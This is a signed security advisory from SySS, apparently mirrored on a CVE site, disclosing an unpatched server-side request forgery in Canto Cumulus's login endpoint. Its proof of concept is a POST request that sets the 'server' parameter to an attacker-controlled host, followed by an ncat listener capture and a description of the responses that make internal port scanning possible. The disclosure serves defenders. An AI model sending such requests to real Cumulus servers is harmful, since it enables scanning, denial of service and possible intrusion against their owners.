MISC:https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt


Download: text/plain
Original: www.syss.de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2022-023
Product:                   Canto Cumulus
Manufacturer:              Canto Inc.
Affected Version(s):       Through 11.1.3
Tested Version(s):         11.1.3 (Build 26f5823e)
Vulnerability Type:        Server-Side Request Forgery (CWE-918)
Risk Level:                High
Solution Status:           Mitigation possible
Manufacturer Notification: 2022-03-25
Solution Date:             No solution
Public Disclosure:         2022-06-01
CVE Reference:             Not yet assigned
Author of Advisory:        Thibaud Kehler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Canto Cumulus is a digital asset management (DAM).[1]

Due to missing validation of untrusted input, the Cumulus web server is
vulnerable to server-side request forgery (SSRF) with an unknown
proprietary protocol. This behavior poses a risk for denial-of-service
(DoS) attacks, impersonation attacks and attacks on the protocol with
the theoretical result of remote code execution (RCE) or authentication
bypass.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When logging in to the web server via the form at the URL
https://hostname.example/cwc/login, a hidden URL parameter 'server' is
sent to the server in the respective HTTP POST request to
https://hostname.example/cwc/catalog.

Afterwards, the web server establishes a TCP connection to the system
specified in that request via an unknown protocol.

This yields the following problems:

 * Denial of service: The web server keeps the TCP connection open for
   around 60 seconds. This could be misused to fill limited resources
   on the server or the server's infrastructure, e.g. NAT tables or
   connection pools, resulting in a DoS.

 * Internal port scan: The web server would respond differently if it was
   able to establish a connection to the specified TCP port. An
   attacker could use this behavior to conduct a port scan on the
   internal network.

 * Authentication bypass (theoretical): As the server is specified
   during authentication, it might be possible that the server-side request
   is used to verify the credentials given to the login form. An
   attacker could pretend to be an authentication server and forge a
   successful login or elevated privileges to the web application.

 * Protocol attacks (theoretical): The server-side request uses an
   unknown binary protocol. An attacker might launch further attacks on
   that protocol, e.g. buffer overflow or deserialization attacks. In
   the worst case, if the server implementation of the protocol is
   vulnerable to such attacks, this will result in RCE on the server.

SySS recommends restricting web server-side requests to a limited set
of trusted servers.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An attacker can specify an arbitrary IP address / hostname and port, as
depicted in the following HTTP POST request:

    POST /cwc/catalog HTTP/1.1
    Host: hostname.example
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 123

    OWASP_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80

During the response, the web server connects to the specified TCP port on the
specified host via an unknown proprietary protocol:

    # ncat -nlvp 80 | hexdump -C
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::80
    Ncat: Listening on 0.0.0.0:80
    Ncat: Connection from [WAN IP].
    Ncat: Connection from [WAN IP]:10402.
    00000000  00 00 00 28 72 65 63 6f  00 00 00 02 00 00 00 04  |...(reco........|
    00000010  63 4d 49 44 4c 6f 6e 67  73 69 52 51 00 00 00 04  |cMIDLongsiRQ....|
    00000020  53 65 72 23 4c 6f 6e 67  00 04 77 7b 00 00 00 18  |Ser#Long..w{....|
    00000030  72 65 63 6f 00 00 00 01  00 00 00 04 63 4d 49 44  |reco........cMID|
    00000040  4c 6f 6e 67 51 75 69 74                           |LongQuit|
    00000048

If the specified host responds in an unexpected way, the web server
closes the server-side connection and responds to the initial HTTP
request with HTTP error code 302 and a redirection to an error page:

    HTTP/1.1 302
    Server: nginx
    Date: Wed, 23 Mar 2022 16:31:43 GMT
    Content-Type: text/json;charset=utf-8
    Content-Length: 0
    Connection: keep-alive
    Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=16070400
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true

If the DNS name cannot be resolved or if the specified TCP port is
unreachable, the server responds with HTTP error code 500 and renders
the login form with HTML containing an additional error message 
which states that the server could not be reached.

This differing behavior enables the internal port scan.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released a patch and will not address the 
vulnerability. 

The manufacturer recommends securing the Cumulus server by using a firewall.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-03-18: Vulnerability discovered
2022-03-25: Vulnerability reported to the manufacturer
2022-05-11: Manufacturer informed SySS that it will not address the vulnerability
2022-06-01: Public disclosure of the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Canto Cumulus
    https://www.canto.com/de/cumulus/
[2] SySS Security Advisory SYSS-2022-023 (not yet published)
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler of SySS GmbH.

E-Mail: [email protected]
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB645 7D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF
fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a
MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9
n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu
bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt
nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek
cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK
XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI
sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa
zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG
040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6
6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU=
=FDje
-----END PGP SIGNATURE-----
© CVE.report 2023 Twitter Nitter Twitter Viewer |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

CVE.report and Source URL Uptime Status status.cve.report